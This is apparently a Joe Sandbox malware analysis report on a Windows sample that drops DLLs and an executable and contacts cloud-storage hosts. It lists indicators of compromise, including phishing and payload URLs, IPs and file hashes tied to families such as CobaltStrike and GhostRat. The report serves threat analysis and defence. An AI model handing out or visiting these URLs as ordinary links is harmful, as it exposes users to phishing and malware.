https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZR	LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
43.153.232.151	unknown	Japan	4249	LILLY-ASUS	false
159.75.57.35	gz.file.myqcloud.com	China	1257	TELE2EU	false
43.152.64.193	sgp.file.myqcloud.com	Japan	4249	LILLY-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481572
Start date and time:	2024-07-25 11:24:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002B_78.exe
Detection:	MAL
Classification:	mal56.winEXE@3/20@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 18 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LisectAVT_2403002B_78.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
43.153.232.151	https://docs.google.com/forms/d/e/1FAIpQLSd_bMMDEWSSp-iRMafeGAWTfMTpG6IiqHpDoivX_zCH9lj_Zw/viewform	Get hash	malicious	HTMLPhisher	Browse
	https://vtcorporatelawyer-1321712386.cos.ap-singapore.myqcloud.com/vtcorporatelawyer.html	Get hash	malicious	HTMLPhisher	Browse
	https://kj8vfy3vivc1fhu-1320008508.cos.ap-singapore.myqcloud.com/kj8vfy3vivc1fhu.html	Get hash	malicious	HTMLPhisher	Browse
159.75.57.35	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse
159.75.57.35	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse
43.152.64.193	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vRohTcL0scSvPTUjrKWcVmyILi9jTVB0uhYEMgOqhUUgmUBldmrlihahC-89vk0R9QgPxfjip6DFmJL/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse
	Sgrlaw Tuesday February 2024 .html	Get hash	malicious	HTMLPhisher	Browse
	https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbU1CcXZZMzBCNGF5bWp3dml0VXZWYzE1NjI4d3xBQ3Jtc0trTnp1VG8zTHl0MzdqYTFKSjcxOVhScGo2YS1RNzk3cmk4ZWhlWDYzSzN6dEFkRDRNZnpyVUszU2Fyd1g3OWItdWdMT09XT1ctNl9LdXVBWE5MY2ZWYjRSSEszOHMzanNETWJUbnQydV9uNjlkWDdjVQ&q=http%3A%2F%2Fkilox.online/Bigge/Bigge/Bigge#Mcarden@Bigge.Com##	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse
	https://attachmentpresentation.w3spaces.com/	Get hash	malicious	HTMLPhisher	Browse
	https://www.canva.com/design/DAFsQ0XaPhk/x_dxzzL9sdOp-3kjTvk60Q/view?utm_content=DAFsQ0XaPhk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Unknown	Browse
	https://media.xtiles.app/2d471b1aee43e8ce19f50b523d9e6439625bec4043ca3afd6447dfbc027aa04f07be0f7d8f8061646e59a6e9eaa0999e	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sgp.file.myqcloud.com	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	https://docs.google.com/presentation/d/e/2PACX-1vRohTcL0scSvPTUjrKWcVmyILi9jTVB0uhYEMgOqhUUgmUBldmrlihahC-89vk0R9QgPxfjip6DFmJL/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	43.152.64.193
	https://v02i29jwyl-1324277188.cos.ap-singapore.myqcloud.com/v02i29jwyl.html	Get hash	malicious	HTMLPhisher	Browse	43.153.232.152
	https://docs.google.com/presentation/d/e/2PACX-1vRLd0kcVFz9h2YfkJ5nqT-SOn8rPnsID4V6KoblagKxsqmWxdzqw58DZbzyFQwP58roXNGiXOHm3hC-/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	43.153.232.152
	Complete Doc_ Notifier - ID #2378936496.eml	Get hash	malicious	HTMLPhisher	Browse	43.152.64.207
	Sgrlaw Tuesday February 2024 .html	Get hash	malicious	HTMLPhisher	Browse	43.152.64.193
	https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbU1CcXZZMzBCNGF5bWp3dml0VXZWYzE1NjI4d3xBQ3Jtc0trTnp1VG8zTHl0MzdqYTFKSjcxOVhScGo2YS1RNzk3cmk4ZWhlWDYzSzN6dEFkRDRNZnpyVUszU2Fyd1g3OWItdWdMT09XT1ctNl9LdXVBWE5MY2ZWYjRSSEszOHMzanNETWJUbnQydV9uNjlkWDdjVQ&q=http%3A%2F%2Fkilox.online/Bigge/Bigge/Bigge#Mcarden@Bigge.Com##	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	43.152.64.193
	https://www.canva.com/design/DAF8OGGfhO8/R6YCNNVrsg2_7X2EE7u58g/view?utm_c_ontent_=DAF8OGGfhO8&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	43.152.64.207
gz.file.myqcloud.com	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse	159.75.57.35
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	159.75.57.69
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	159.75.57.69
	buding.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	Q6UkPxz1Bk.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	Q6UkPxz1Bk.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	#U8d85#U7ea7#U6587#U672cTXT.exe	Get hash	malicious	AsyncRAT, DcRat, VenomRAT	Browse	159.75.57.36

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LILLY-ASUS	LisectAVT_2403002C_3.exe	Get hash	malicious	FormBook	Browse	43.132.225.97
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_192.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_194.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_192.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_194.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002B_257.exe	Get hash	malicious	Bdaejec	Browse	43.132.235.4
	d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe	Get hash	malicious	Bdaejec	Browse	43.152.44.86
TELE2EU	Rx1EfzuTh3.elf	Get hash	malicious	Unknown	Browse	5.241.71.249
	3B4ehVz4C4.elf	Get hash	malicious	Mirai	Browse	83.185.2.111
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	130.244.180.166
	Ym4vc47pgk.elf	Get hash	malicious	Unknown	Browse	90.131.48.45
	cJTpn6cF6x.elf	Get hash	malicious	Unknown	Browse	83.183.143.157
	4qOdQ3lrYx.elf	Get hash	malicious	Mirai	Browse	212.152.10.126
	ZPPEqPIBy7.elf	Get hash	malicious	Unknown	Browse	83.183.231.134
	92.249.48.47-skid.ppc-2024-07-20T09_04_20.elf	Get hash	malicious	Mirai, Moobot	Browse	193.216.244.26
	92.249.48.47-skid.x86-2024-07-20T09_04_17.elf	Get hash	malicious	Mirai, Moobot	Browse	159.76.186.9
LILLY-ASUS	LisectAVT_2403002C_3.exe	Get hash	malicious	FormBook	Browse	43.132.225.97
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_57.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002C_192.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_194.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_192.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002C_194.exe	Get hash	malicious	Unknown	Browse	43.129.31.231
	LisectAVT_2403002B_257.exe	Get hash	malicious	Bdaejec	Browse	43.132.235.4
	d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe	Get hash	malicious	Bdaejec	Browse	43.152.44.86

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	LisectAVT_2403002B_9.exe	Get hash	malicious	BlackMoon	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	LisectAVT_2403002B_8.exe	Get hash	malicious	Bdaejec	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	LisectAVT_2403002B_89.exe	Get hash	malicious	CobaltStrike	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	LisectAVT_2403002B_9.exe	Get hash	malicious	BlackMoon	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	LisectAVT_2403002B_89.exe	Get hash	malicious	CobaltStrike	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	LisectAVT_2403002C_129.exe	Get hash	malicious	Upatre	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	SEL1685129 AMANOS.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	43.153.232.151 159.75.57.35 43.152.64.193
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	43.153.232.151 159.75.57.35 43.152.64.193

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Mysoftwaref\msvcp120.dll	3vS3F5eukR.exe	Get hash	malicious	Unknown	Browse
	3vS3F5eukR.exe	Get hash	malicious	Unknown	Browse
	eWIIsxIoe5.exe	Get hash	malicious	Unknown	Browse
	eWIIsxIoe5.exe	Get hash	malicious	Unknown	Browse
	CloudInstaller.zip	Get hash	malicious	Unknown	Browse
	lookworldafs1244.msi	Get hash	malicious	Unknown	Browse
	KuaiVpn-n.msi	Get hash	malicious	Unknown	Browse
	lookworldafs1244.msi	Get hash	malicious	Unknown	Browse
	KuaiVpn-n.msi	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll	N-9hndmrcq j9uj93.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Mysoftwaref\4.bin

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	477
Entropy (8bit):	5.6505598654728155
Encrypted:	false
SSDEEP:	12:TM3iu5vw5puA9WZSEprCADmQfqUeb/XOaGUPUG/zHkojXbv:qV5o5pV4prCsSUeb/++UukorL
MD5:	8EA4344C7054D7A48AB5394863B4CB99
SHA1:	219A12BB4E04B6021C2EEAB106BF6757C549B05A
SHA-256:	A878A050BF30EB7D162CF8422436AB86E7486C822FEE6F14AB3068F7475277BB
SHA-512:	9A325CA255E7C7EB778FF61EA006088C817AA379B836A0D81BDE106857237B05402951B50180B27E8FFF440CB93219FCF1980EBFD37D7D16E24AF0BEFA5FC943
Malicious:	false
Reputation:	low
Preview:	<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>UnavailableForLegalReasons</Code>..<Message>Due to your account is arrears, it is unavailable until you recharge.</Message>..<Resource>/qd.bin</Resource>..<RequestId>NjZhMjFhMmFfYzVkMmIyMDlfOTUyY18yNGI1OWMz</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MmIzZjU5NDVmMTI0ZDFhMTNhODBhOTVmZmJiYzEyNzA=</TraceId>.</Error>..

C:\Program Files (x86)\Mysoftwaref\cximagecrt.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1597304
Entropy (8bit):	6.637291537967305
Encrypted:	false
SSDEEP:	24576:gzpjfQWnxImuy/53F9F2LZFTSnvZYfHfE0jr8HDYn8HyTdUZ8:g1zQUgVDjwHcn8STW8
MD5:	66DF6F7B7A98FF750AADE522C22D239A
SHA1:	F69464FE18ED03DE597BB46482AE899F43C94617
SHA-256:	91E3035A01437B54ADDA33D424060C57320504E7E6A0C85DB2654815BA29C71F
SHA-512:	48D4513E09EDD7F270614258B2750D5E98F0DBCE671BA41A524994E96ED3DF657FCE67545153CA32D2BF7EFCB35371CAE12C4264DF9053E4EB5E6B28014ED20E
Malicious:	false
Joe Sandbox View:	Filename: N-9hndmrcq j9uj93.msi, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .y.A..A..A.v.V.A...L.A...N.A...q.A...p.A.].u8A..9..A..A.A.].p.A.].M.A...J.A..A..A.].O.A.Rich.A.*................PE..L....N.Z...........!.........,.......................................................C....@..............................r...........................&..x9......tu......................................@............................................text...y........................... ..`.rdata..............................@..@.data...`........,...~..............@....rsrc...............................@..@.reloc..tu.......v..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\libcurl.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38896
Entropy (8bit):	6.559102503083516
Encrypted:	false
SSDEEP:	768:CO+/dMq5EVz8TZvpEYixxqAMxkEhpdDGPrUf2hn:fYMq5kz8ppE7XIxTMUf+
MD5:	DA33AD352674B718A8B1EBBB6D77A38B
SHA1:	F2EF372864D39D4C7892F0DC3325233174B791DD
SHA-256:	045C585B661C21ECDE016C752143F4B358C3131CC01C12420454037AE0F02813
SHA-512:	79D1132D03C4E07BC11238E1E3B32447C00048732104B26CD890B161CABA92068141A50605C4A42E9B0614139D7EC786D3B52D6E1176EF0F4C828EBB4B755F01
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........wZ...4..4..4.n...4.I.5..4.I.1..4.I.0..4.I.7..4..n5..4..5..4.d.=..4.d.4..4.d....4.....4.d.6..4.Rich..4.................PE..L....).e...........!...'.....n............... ............................................@..........................%.......&..P....@...S...........\|..........T....!..p............................ ..@............ ..\|............................text...x........................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc....S...@...T...&..............@..@.reloc..T............z..............@..B................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\msvcp120.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455328
Entropy (8bit):	6.698367093574994
Encrypted:	false
SSDEEP:	12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
MD5:	FD5CABBE52272BD76007B68186EBAF00
SHA1:	EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
SHA-256:	87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
SHA-512:	1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
Malicious:	false
Joe Sandbox View:	Filename: 3vS3F5eukR.exe, Detection: malicious, Browse Filename: 3vS3F5eukR.exe, Detection: malicious, Browse Filename: eWIIsxIoe5.exe, Detection: malicious, Browse Filename: eWIIsxIoe5.exe, Detection: malicious, Browse Filename: CloudInstaller.zip, Detection: malicious, Browse Filename: lookworldafs1244.msi, Detection: malicious, Browse Filename: KuaiVpn-n.msi, Detection: malicious, Browse Filename: lookworldafs1244.msi, Detection: malicious, Browse Filename: KuaiVpn-n.msi, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N.Nm.gN.Nm.bN*.NRich+.N........................PE..L....\|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	446840
Entropy (8bit):	6.690279428020546
Encrypted:	false
SSDEEP:	12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
MD5:	C766CA0482DFE588576074B9ED467E38
SHA1:	5AC975CCCE81399218AB0DD27A3EFFC5B702005E
SHA-256:	85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
SHA-512:	EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\msvcr120.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970912
Entropy (8bit):	6.9649735952029515
Encrypted:	false
SSDEEP:	12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
MD5:	034CCADC1C073E4216E9466B720F9849
SHA1:	F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
SHA-256:	86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
SHA-512:	5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....\|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\software.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1659120
Entropy (8bit):	6.598425597611016
Encrypted:	false
SSDEEP:	24576:aDPgc5j2oEEiq59Ry8naimjP/RPszWxkk9xx5x/luqxni0DRk70DRkctvdET5tG:1aiqNxaimjP/NNVrx5x/oek5tG
MD5:	5F29A3A467D2B501FFDAC96E72665B83
SHA1:	B60A014B8E99E331187723B93365E7FC76E0AB51
SHA-256:	D66DD58752E43A523759327307490D62C56A9C8F7A04CE7B8BF3F2B5C1ACEAC9
SHA-512:	1D3D6A8E85773079DDBB971E70AEC6A3F36A33FA582F65FA4B6E40AFDFEB35FDE87D568B268C3F54A802F8F352A09C5888E46F69A8B33166CAF7B94576E72DAB
Malicious:	false
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........[............70?.......'.............to).......%.............to6.....to(.....to3.......%......................................#.......o.......&.....Rich....................PE..L....f[d.....................X....................@..........................p......H.....@..................................v...........................R...`..t.......8...............................@...............\|............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc................R..............@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mysoftwaref\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91104
Entropy (8bit):	6.919609919273454
Encrypted:	false
SSDEEP:	1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
MD5:	9C133B18FA9ED96E1AEB2DA66E4A4F2B
SHA1:	238D34DBD80501B580587E330D4405505D5E80F2
SHA-256:	C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
SHA-512:	D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LisectAVT_240300_f25cc6c7bfcfed304a6d9d6f9776533c335c6b_7a9050f1_efe7e75f-a8f7-4b62-a3e1-c7b7e22e62fe\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0156307321504288
Encrypted:	false
SSDEEP:	192:2WgQVu0XLc0BU/wjHzn/zuiF4Z24IO8D:vg0XLXBU/wjjzuiF4Y4IO8D
MD5:	1D650419E28B25EC0E4145B340C031AE
SHA1:	4C0D442C4FE1430AC5D29E2354A6049BAF895F71
SHA-256:	FCD4B949DE09FBBAF5227E5FB2306F0999C6C6F1017A81B0DEB6790D64C3ABAF
SHA-512:	93E112AF5A65EFB5BF27782A8C8465500F0585636EE6732368A714F4B08E9A174BB25A62A131EC7C90B2DBFF9F83249C8F4FD75D31E3E4C4E180FC36C9412967
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.7.3.1.6.2.4.0.6.9.7.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.7.3.1.6.2.8.4.4.4.5.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.e.7.e.7.5.f.-.a.8.f.7.-.4.b.6.2.-.a.3.e.1.-.c.7.b.7.e.2.2.e.6.2.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.a.6.7.9.f.a.-.1.8.f.c.-.4.8.e.1.-.a.0.9.2.-.8.4.e.2.9.5.0.4.a.7.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.i.s.e.c.t.A.V.T._.2.4.0.3.0.0.2.B._.7.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.c.0.-.0.0.0.1.-.0.0.1.5.-.6.6.7.6.-.e.4.9.6.7.4.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.9.6.a.3.e.1.1.8.c.a.a.9.d.f.5.f.3.a.e.d.1.4.0.d.8.0.0.8.0.0.0.0.0.0.0.4.0.8.!.0.0.0.0.4.3.4.a.0.f.5.4.5.d.0.a.a.a.f.a.f.c.1.b.f.5.3.6.6.f.9.8.1.8.7.3.5.6.e.3.7.a.3.a.!.L.i.s.e.c.t.A.V.T._.2.4.0.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1547.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jul 25 09:26:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	133564
Entropy (8bit):	1.886789540130812
Encrypted:	false
SSDEEP:	384:AIaCZFC5kQhy7xGkN45lpRYi4Cz1RxETyHVvKJ5jAkEXNkObyYhGRj:sk1QhygkN45C4bWK1KP9cqbt
MD5:	08EA73F567A19F381C1E82356C81964D
SHA1:	A3A4FF7E6CD0DA21620B1132B780BE61E17C5318
SHA-256:	664E8F43C705162C092C4699BE3B0F5724CBECFBF19B86F5CE8777B7065C4B59
SHA-512:	21D0B7298A7CAAA9F94D19ED5FE4BC3BDC81138C4D8249D32016829369D2C202425E08176D0ED255D6CA57A15DD34910BF5A73258CBB17F116B95F4A0B5B64FF
Malicious:	false
